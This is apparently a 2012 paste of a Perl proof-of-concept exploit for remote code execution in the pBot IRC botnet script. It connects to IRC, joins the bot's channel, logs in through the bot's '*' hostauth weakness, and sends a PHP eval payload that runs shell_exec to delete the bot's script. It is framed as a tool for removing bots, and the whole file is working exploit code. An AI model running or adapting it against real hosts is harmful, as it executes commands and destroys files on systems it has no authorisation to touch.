bwall

pBot RCE PoC

Jul 31st, 2012
  1. #!/usr/bin/perl
  2. # Exploit Title: pBot Remote Code Execution ("*" hostauth)
  3. # Date: 31.07.2012
  4. # Exploit Author: @bwallHatesTwits
  5. # Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
  6. # Version: Various versions
  7. # Tested on: Linux 3.2
  8.  
  9. use IO::Socket;
  10. use IO::Select;
  11. use IO::Socket::INET;
  12. use Socket;
  13.  
  14. my $nickname = "BotSlayer";
  15. my $ident = "BotSlayer";
  16. my $fullname = "BotSlayer";
  17. $sel_client = IO::Select->new();
  18.  
  19. #configuration values from the bot source
  20. $ircserver = "localhost";                   #"server"
  21. $ircserverpass = "";                        #"pass"
  22. my $ircport = "6667";                       #"port"
  23. #if "key" is set, then add a space and the password to the chan name
  24. my @channels = ("#anonbxu");                #"chan" and "chan2"
  25. $botPass = "hello";                         #"password"
  26. $botTrigger = ".";                          #"trigger"
  27. #hostauth must be "*"
  28. $loginCMD = "user";                         #usually user or login
  29.  
  30. #payload - PHP code to run
  31. #This version deletes the bots originating script, and dies
  32. $phpEval = "shell_exec(\"rm -f \".\$_SERVER['SCRIPT_NAME']);exit();";
  33.  
  34. $channelCount = scalar(@channels);
  35.  
# Called from parse() when a JOIN line is seen.  Logs in to the bot in that
# channel using the configured trigger, login command and password, waits a
# second, then hands $phpEval to the bot's eval command and counts the
# channel as handled via tryQuit().
#
# $channel is the raw JOIN parameter, which still carries its leading ':';
# substr() strips it.  Reads the globals $botTrigger, $loginCMD, $botPass
# and $phpEval.  'say' here is this file's own PRIVMSG helper, not the
# 'say' feature (which is never enabled in this script).
sub onJoin
{
    my $channel = shift;
    $channel = substr($channel, 1);   # drop the ':' prefix from the JOIN parameter
    print "Joined $channel\n";
    # Bot login: "<trigger><loginCMD> <password>".  The bot honours this from
    # any sender only because its hostauth is "*" (see header comment); a
    # hostauth restricted to a specific mask would presumably reject it.
    say($channel, $botTrigger.$loginCMD." $botPass");
    sleep(1);   # give the bot time to process the login before the eval
    # "\@BallastSec" is the first word after "eval"; its meaning is defined
    # by the bot's command parser — TODO confirm against the bot source.
    say($channel, $botTrigger."eval \@BallastSec ".$phpEval);
    print "Payload delivered\n";
    tryQuit();   # disconnect once every configured channel has been handled
}
  47.  
  48. sub tryQuit
  49. {
  50.     $channelCount--;
  51.     if($channelCount == 0)
  52.     {
  53.         quit("whomp wha");
  54.     }
  55. }
  56.  
  57. sub sendraw
  58. {
  59.     if ($#_ == '1')
  60.     {
  61.         my $socket = $_[0];
  62.         print $socket "$_[1]\n";
  63.     }
  64.     else
  65.     {
  66.         print $IRC_cur_socket "$_[0]\n";
  67.     }
  68. }
  69.  
  70. sub conn
  71. {
  72.     my $mynick = $_[0];
  73.     my $ircserver_con = $_[1];
  74.     my $ircport_con = $_[2];
  75.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  76.     if (defined($IRC_socket))
  77.     {
  78.         $IRC_cur_socket = $IRC_socket;
  79.         $IRC_socket->autoflush(1);
  80.         $sel_client->add($IRC_socket);
  81.         $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  82.         $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  83.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  84.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  85.         if($ircserverpass != "")
  86.         {
  87.             sendraw("PASS ".$ircserverpass);
  88.         }
  89.         sendraw("NICK ".$mynick);
  90.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  91.         sleep 1;
  92.     }
  93. }
  94.  
# Handle one line received from the IRC server.  Echoes the line to STDOUT,
# then dispatches on the message type:
#   PING     -> reply PONG so the server keeps the connection open
#   JOIN     -> hand the channel (4th capture, still ':'-prefixed) to
#               onJoin(), which delivers the payload
#   PRIVMSG  -> answer a CTCP VERSION request with a NOTICE; the
#               "<mynick> ..." branch captures $natrix/$arg but never uses
#               them, so it is effectively dead code
#   NICK     -> track a change of our own nick in %irc_servers
#   001      -> record the nick the server registered us under and the
#               server name, then JOIN every configured channel
# Reads and writes the globals $mynick, $IRC_cur_socket and %irc_servers.
# Note: the JOIN pattern does not compare the joining nick with $mynick, so
# a JOIN by any other user on this connection would also trigger onJoin().
sub parse
{
    my $servarg = shift;
    print $servarg."\n";
    if ($servarg =~ /^PING \:(.*)/)
    {
        sendraw("PONG :$1");
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/)
    {
        my $channel = $4;   # ':'-prefixed; onJoin() strips the colon
        onJoin($channel);
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/)
    {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^\001VERSION\001$/)
        {
            notice("$pn", "\001VERSION BotSlayer by Ballast Security\001");
        }
        # Captures below are assigned but not used anywhere in this sub.
        if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ )
        {
            my $natrix = $1;
            my $arg = $2;
        }
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i)
    {
        if (lc($1) eq lc($mynick))
        {
            $mynick=$4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    }
    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i)
    {
        # RPL_WELCOME: the server may have altered our nick; keep its version.
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach(@channels)
        {
            sendraw("JOIN $_");
        }
    }
}
# Main event loop: (re)connect until %irc_servers has an entry, then poll
# the selector and feed every received line to parse().
# $line_temp is meant to carry a partial trailing line over to the next
# read, but the only assignment below sets it to '', so a line split across
# two sysread() calls is parsed as two separate fragments.
my $line_temp;
while(1)
{
    # conn() returns 1 without touching %irc_servers on failure, so this
    # spins until a connection succeeds — there is no back-off.
    while (!(keys(%irc_servers)))
    {
        conn($nickname, $ircserver, $ircport);
    }
    # Defensive: drop an empty-string key (an undefined socket stringifies to '').
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);   # zero timeout: non-blocking poll
    # NOTE(review): with a zero timeout this loop runs hot while idle; a
    # positive timeout would avoid the busy-wait.
    next unless(@ready);
    foreach $fh (@ready)
    {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $msg, 4096);
        # 0 means EOF; undef (read error) also compares == 0 here and is
        # handled the same way.  The outer loop reconnects on the next pass.
        if ($nread == 0) {
            $sel_client->remove($fh);
            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $msg);
        $msg =~ s/\r\n$//;   # runs after the split, so it does not affect @lines
        for(my $c=0; $c<= $#lines; $c++)
        {
            $line = $lines[$c];
            $line=$line_temp.$line if ($line_temp);
            $line_temp='';
            $line =~ s/\r$//;   # strip the CR of the IRC CRLF line ending
            parse("$line");
        }
    }
}
  172.  
  173. sub say
  174. {
  175.     return unless $#_ == 1;
  176.     sendraw("PRIVMSG $_[0] :$_[1]");
  177. }
  178.  
  179. sub notice
  180. {
  181.     return unless $#_ == 1;
  182.     sendraw("NOTICE $_[0] :$_[1]");
  183. }
  184.  
  185. sub join
  186. {
  187.     sendraw("JOIN $_[0]");
  188. }
  189.  
  190. sub part
  191. {
  192.     sendraw("PART $_[0]");
  193. }
  194.  
  195. sub quit
  196. {
  197.     sendraw("QUIT :$_[0]");
  198.     exit;
  199. }